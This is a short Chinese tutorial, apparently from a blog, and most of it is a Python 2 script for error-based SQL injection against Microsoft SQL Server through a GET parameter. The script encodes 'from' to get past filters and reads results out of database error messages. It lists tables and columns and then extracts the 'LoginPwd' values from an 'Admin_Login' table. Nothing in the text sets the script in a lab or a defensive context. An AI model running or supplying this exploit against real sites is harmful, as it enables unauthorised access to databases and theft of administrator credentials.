基于mssql的报错注入的脚本(get)
在进行mssql注入的时候,由于各种各样的原因,我们不能使用工具进行值得获取,那么可以自行编写脚本来获取值,python由于其良好的抓取网页的功能,被大家广泛使用。
对于get型的mssql的报错注入,代码如下:
#! /usr/bin/
env python
#coding=utf-8
import re
import urllib
import urllib2
#从访问链接中获取报错信息
def getcontent(payload): #获取网页内容
url1=url+"AND ("+payload+")=1 --- "
content = urllib.urlopen(url1).read()
print content
return content
#从报错回显中提取数值
def getdata(content):
patt = re.compile("nvarchar.*?'(.*?)'.*?int")
data = patt.findall(content)
if data:
return data[0]
else:
return None
#获取当前数据库名
def getcurrentdb():
payload = 'db_name()'
content = getcontent(payload)
data = getdata(content)
print "current_db: "+data
return data
def gettablename(dbname,n): #获取表名
tablelist1=[]
for i in range(n):
payload = "select top 1 name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' and name not in(select top "+str(i)+" name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' order by name) order by name"
try:
content = getcontent(payload)
data = getdata(content)
#print data
if data not in tablelist1:
tablelist1.append(data)
else:
break
except:
continue
print tablelist1
print '--------------------'
def getcolumns(dbname,table,n): #获取列名
tablelist2=[]
for i in range(n):
payload="Select top 1 name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') and name not in (Select top "+str(i)+" Name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') order by name) order by name"
try:
content = getcontent(payload)
data = getdata(content)
if data not in tablelist2:
tablelist2.append(data)
else:
break
except:
continue
print table
print tablelist2
print '--------------------'
def getvalue(dbname,table,column,n): #获取各字段的值
tablelist3=[]
for i in range(n):
payload="select top 1 "+column+" %u0066rom "+table+" where "+column+" not in(select top "+str(i)+" "+column+" %u0066rom "+table+" order by id)order by id"
try:
content = getcontent(payload)
data = getdata(content)
if data not in tablelist3:
tablelist3.append(data)
else:
break
except:
continue
print column
print tablelist3
if __name__ == "__main__":
url="http://www.example/pages/BulletinPage.aspx?id=21"
global url
db=getcurrentdb()
gettablename('saa',200)
getcolumns(db,'Admin_Login',50)
getvalue(db,'Admin_Login','LoginPwd',50) #可自行选择注释,只留你需要的那个函数进行值得获取